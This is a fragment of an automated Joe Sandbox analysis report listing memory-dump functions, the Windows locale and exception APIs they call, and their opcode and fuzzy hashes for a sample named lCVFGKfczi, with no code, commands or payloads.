                                                            • Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ``C$x`C
                                                            • API String ID: 0-4276601940
                                                            • Opcode ID: 4639c864b91f6e9cc3f469510a2f9944f86d2f54ec5b532889058d1e4e41c286
                                                            • Instruction ID: 3b4b5bae445cce6fb8a5dbdb510ef3840b8b7ec496e20e0b6abfb5328e60feaf
                                                            • Opcode Fuzzy Hash: 4639c864b91f6e9cc3f469510a2f9944f86d2f54ec5b532889058d1e4e41c286
                                                            • Instruction Fuzzy Hash: 3851C4739001169BEB18CF58D4817E977B1EF94308F2694BEC84AEF2C6EB705955CB50
                                                            APIs
                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00DD5727,?,?,00000008,?,?,00DE15F5,00000000), ref: 00DD5959
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExceptionRaise
                                                            • String ID:
                                                            • API String ID: 3997070919-0
                                                            • Opcode ID: 7f1e16ff82983787c962f4ad835f5cd93ee7d0d9ed27da7de9fc5ab02491ab29
                                                            • Instruction ID: c588409bf1c0847bf93eaeed3c00c1a34c93bc17a3dc7c47a3f13c557a55c333
                                                            • Opcode Fuzzy Hash: 7f1e16ff82983787c962f4ad835f5cd93ee7d0d9ed27da7de9fc5ab02491ab29
                                                            • Instruction Fuzzy Hash: 99B14A31610A08DFD718CF28D496A647BA0FF45364F29865AE8DACF3A5C335E992CF50
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00DC72B2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FeaturePresentProcessor
                                                            • String ID:
                                                            • API String ID: 2325560087-0
                                                            • Opcode ID: 8696e6fc17d60b408142676b74e764760db32f9f79aac665ef0c3cfb98908573
                                                            • Instruction ID: 02fd738ea474d24f7afa7d0eb56c1bbccd4f8e3178801eb24a182bcfed8d22dd
                                                            • Opcode Fuzzy Hash: 8696e6fc17d60b408142676b74e764760db32f9f79aac665ef0c3cfb98908573
                                                            • Instruction Fuzzy Hash: DFA17DB19157458FDB18CF64D8C2BA9BBB1FB88324F28816ED419EB3A0D7349941CF60
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6d4e07ada68a32889de3ba2ff3388249f2c3c002fa7142026603b0bc8aefe2c5
                                                            • Instruction ID: 2c7f19f79c1961acbba3d9733b579063cac773719fdfe0b7fafdb53845f50d6c
                                                            • Opcode Fuzzy Hash: 6d4e07ada68a32889de3ba2ff3388249f2c3c002fa7142026603b0bc8aefe2c5
                                                            • Instruction Fuzzy Hash: 8531C876900219AFCB20EFA8DCD5EBBB76DEB84314F19415AF90597344EA31AE408B70
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 0
                                                            • API String ID: 0-4108050209
                                                            • Opcode ID: 1f8a7aecf4b8b8a0699fb58a0be1a988316c41bb45692e393a6bbc5531041aad
                                                            • Instruction ID: ef42fcd1cc161fc1274c05c1733d3ee91f1e1b2fe6ff204ef2a311b989e5c852
                                                            • Opcode Fuzzy Hash: 1f8a7aecf4b8b8a0699fb58a0be1a988316c41bb45692e393a6bbc5531041aad
                                                            • Instruction Fuzzy Hash: D0C1B0705206478FCB24CFA8C581F7ABBB6AB05310F18665DE69E97291C730ED45CB71
                                                            APIs
                                                              • Part of subcall function 00DD4EB1: GetLastError.KERNEL32(?,00000008,00DD9482), ref: 00DD4EB5
                                                              • Part of subcall function 00DD4EB1: SetLastError.KERNEL32(00000000,00DEC480,00000024,00DD0419), ref: 00DD4F57
                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00DDC73F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$InfoLocale
                                                            • String ID:
                                                            • API String ID: 3736152602-0
                                                            • Opcode ID: ce5039e30cef9568cd2ebdd4908624926eeddf000a2a4475f10fe475e210f072
                                                            • Instruction ID: 9953e6fec0786cd3a0cace18d42623831aff30695ec438c123d6d43d16e6fdbb
                                                            • Opcode Fuzzy Hash: ce5039e30cef9568cd2ebdd4908624926eeddf000a2a4475f10fe475e210f072
                                                            • Instruction Fuzzy Hash: ED217F32625207BBEB28AE25DC82A7A77A8EF44310F14106BF905D6341EB34ED41CB70
                                                            APIs
                                                              • Part of subcall function 00DD4EB1: GetLastError.KERNEL32(?,00000008,00DD9482), ref: 00DD4EB5
                                                              • Part of subcall function 00DD4EB1: SetLastError.KERNEL32(00000000,00DEC480,00000024,00DD0419), ref: 00DD4F57
                                                            • EnumSystemLocalesW.KERNEL32(00DDC498,00000001,00000000,?,-00000050,?,00DDCAC9,00000000,?,?,?,00000055,?), ref: 00DDC3E4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                            • String ID:
                                                            • API String ID: 2417226690-0
                                                            • Opcode ID: b2d136e6b06027bc987ceac1803beede4524184833aa61f2396b3cce8c57fb02
                                                            • Instruction ID: 898aeff5e073234c742ff4c2f0fc25b9142193e3f7aad2688b3ea6314f94e468
                                                            • Opcode Fuzzy Hash: b2d136e6b06027bc987ceac1803beede4524184833aa61f2396b3cce8c57fb02
                                                            • Instruction Fuzzy Hash: C21148372103025FDB18AF38C8A15BABBA1FF80368F18842EE94787B40D771B942C760
                                                            APIs
                                                              • Part of subcall function 00DD4EB1: GetLastError.KERNEL32(?,00000008,00DD9482), ref: 00DD4EB5
                                                              • Part of subcall function 00DD4EB1: SetLastError.KERNEL32(00000000,00DEC480,00000024,00DD0419), ref: 00DD4F57
                                                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00DDC6B4,00000000,00000000,?), ref: 00DDC946
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$InfoLocale
                                                            • String ID:
                                                            • API String ID: 3736152602-0
                                                            • Opcode ID: baf9a1cf19f44af01a6ff098fe447e43f65adb86b39c80d169d1034d8ac19622
                                                            • Instruction ID: 055e195cbcc3acf24df5f4f3da67eb5fe7dbb6c7f45165d0c6114fc72852423a
                                                            • Opcode Fuzzy Hash: baf9a1cf19f44af01a6ff098fe447e43f65adb86b39c80d169d1034d8ac19622
                                                            • Instruction Fuzzy Hash: 83F0A933610113BBDB245A658855BBA7758EF40755F19442AED46A3380DA74FE41CAB0
                                                            APIs
                                                              • Part of subcall function 00DD4EB1: GetLastError.KERNEL32(?,00000008,00DD9482), ref: 00DD4EB5
                                                              • Part of subcall function 00DD4EB1: SetLastError.KERNEL32(00000000,00DEC480,00000024,00DD0419), ref: 00DD4F57
                                                            • EnumSystemLocalesW.KERNEL32(00DDC6EB,00000001,?,?,-00000050,?,00DDCA8D,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00DDC457
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                            • String ID:
                                                            • API String ID: 2417226690-0
                                                            • Opcode ID: 85ce6e746c166a19fd49cb9d3ceddad0185bf404c5bbc5d201ea0fac3607cd48
                                                            • Instruction ID: 9b5813ea66c6877530ebffd187c36dd9b54bb871e52028821372a3af49656f4d
                                                            • Opcode Fuzzy Hash: 85ce6e746c166a19fd49cb9d3ceddad0185bf404c5bbc5d201ea0fac3607cd48
                                                            • Instruction Fuzzy Hash: 61F0C2362103056FDB146F79DC91A7ABB95EB80768F19842EF9468B790C6B1AC42CB60
                                                            APIs
                                                              • Part of subcall function 00DCDDC1: EnterCriticalSection.KERNEL32(?,?,00DD4B89,?,00DEC2E0,00000008,00DD4D4D,?,00DCC446,?), ref: 00DCDDD0
                                                            • EnumSystemLocalesW.KERNEL32(00DD5D72,00000001,00DEC3A0,0000000C,00DD6127,00000000), ref: 00DD5DB7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalEnterEnumLocalesSectionSystem
                                                            • String ID:
                                                            • API String ID: 1272433827-0
                                                            • Opcode ID: f742ad2f9ebdf250ed9b011bd3837880e361ed2a272f8e7904c0064acdac389b
                                                            • Instruction ID: 642a4aa343639e1fe139c06adf5a1a50e3d3b939a143b72d3d92bea86c7c4df8
                                                            • Opcode Fuzzy Hash: f742ad2f9ebdf250ed9b011bd3837880e361ed2a272f8e7904c0064acdac389b
                                                            • Instruction Fuzzy Hash: B0F03776A00311EFD700EF98E846B997BB1EB44721F10812AE421EB3A0CBB55A058B60
                                                            APIs
                                                              • Part of subcall function 00DD4EB1: GetLastError.KERNEL32(?,00000008,00DD9482), ref: 00DD4EB5
                                                              • Part of subcall function 00DD4EB1: SetLastError.KERNEL32(00000000,00DEC480,00000024,00DD0419), ref: 00DD4F57
                                                            • EnumSystemLocalesW.KERNEL32(00DDC280,00000001,?,?,?,00DDCAEB,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00DDC35E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                            • String ID:
                                                            • API String ID: 2417226690-0
                                                            • Opcode ID: affb05357dc1292a446f98c56dec56f9924c2e86848fed14d1732b8b958650fe
                                                            • Instruction ID: d2166c9b413bc639b86f092e4555821296dfa2bf35960621f9f71e48d81c4405
                                                            • Opcode Fuzzy Hash: affb05357dc1292a446f98c56dec56f9924c2e86848fed14d1732b8b958650fe
                                                            • Instruction Fuzzy Hash: 18F0E53630020667CB14AF79D84567ABF94EFC1B60F0A405AEA09CB790C6729946C7B0
                                                            APIs
                                                            • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00DD23AE,?,20001004,00000000,00000002,?,?,00DD19B0), ref: 00DD625F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InfoLocale
                                                            • String ID:
                                                            • API String ID: 2299586839-0
                                                            • Opcode ID: 2e69608b8f02aef7048a2a5fb2cd2e4cd4873899b3eaf55ea40d9ae32c6c9700
                                                            • Instruction ID: 1b03433d598783e2e5cebd677d85cc1cacdc8201bbb69d4805e9c118d3049de2
                                                            • Opcode Fuzzy Hash: 2e69608b8f02aef7048a2a5fb2cd2e4cd4873899b3eaf55ea40d9ae32c6c9700
                                                            • Instruction Fuzzy Hash: 49E01A32500268BBCF122F60EC08AAE7F2AEF44760F048016F94566321DB71CA20AAF5
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00007ABB,00DC6DC9), ref: 00DC7AB4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: 155cd4d7ba0ee6449a6c18fdf8b6468a82eb0c2d24fd00bee200f6a130d501dc
                                                            • Instruction ID: f094ce2bb95d848d4de22c98f09c138db92b7f7e71aee4ebdd0bf00931188a4e
                                                            • Opcode Fuzzy Hash: 155cd4d7ba0ee6449a6c18fdf8b6468a82eb0c2d24fd00bee200f6a130d501dc
                                                            • Instruction Fuzzy Hash:
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Z81xbyuAua
                                                            • API String ID: 0-3121583705
                                                            • Opcode ID: 43757a2dec2e3549f05c634746e33a9349a8c803c03793824e0d85c53d5ec343
                                                            • Instruction ID: eaea22139d90cc79b9777b0248ef887b0e26ae9e7153da9860196ed558cc2897
                                                            • Opcode Fuzzy Hash: 43757a2dec2e3549f05c634746e33a9349a8c803c03793824e0d85c53d5ec343
                                                            • Instruction Fuzzy Hash: 44410D76D2053B4BCB4CEEB8C4555ABBB69DB46310B14427EED11DB3D2E234CA01C6E0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: HeapProcess
                                                            • String ID:
                                                            • API String ID: 54951025-0
                                                            • Opcode ID: 1bfbed19de534896c77bcac28a57058e97883d087929c677f62de6e0bf45f78e
                                                            • Instruction ID: 4755c7aa703e8586982e28a006611ceb6777517faf77b827411316a2ac81a4f3
                                                            • Opcode Fuzzy Hash: 1bfbed19de534896c77bcac28a57058e97883d087929c677f62de6e0bf45f78e
                                                            • Instruction Fuzzy Hash: E0A012305003008F43008F36AA4D25836A5560158030480689000C5120D62456415F40
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 640bf8eae2d78ad77c4c4812c82337757702f6639c51110261f3c9d00c87b92d
                                                            • Instruction ID: 7a1801e7757183c049a2ba30758c94bcbcfd0b09554ae4dd6c5ba8e66db3a953
                                                            • Opcode Fuzzy Hash: 640bf8eae2d78ad77c4c4812c82337757702f6639c51110261f3c9d00c87b92d
                                                            • Instruction Fuzzy Hash: 9D02B373E4B6F25B8F314EB944A02B67EB06E0275431F96A9DDC03F187C212DD4A96E0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                            • Instruction ID: 20cca071e4b5eec4d526c3c385989e64cee485aec9b132b2cc9a6e2fa0d908cb
                                                            • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                            • Instruction Fuzzy Hash: 03C1B6B3E4B5F2058B36852D04182BFEE726E82B4931FD3B5DCD03F289C6266D8196D1
                                                            Memory Dump Source
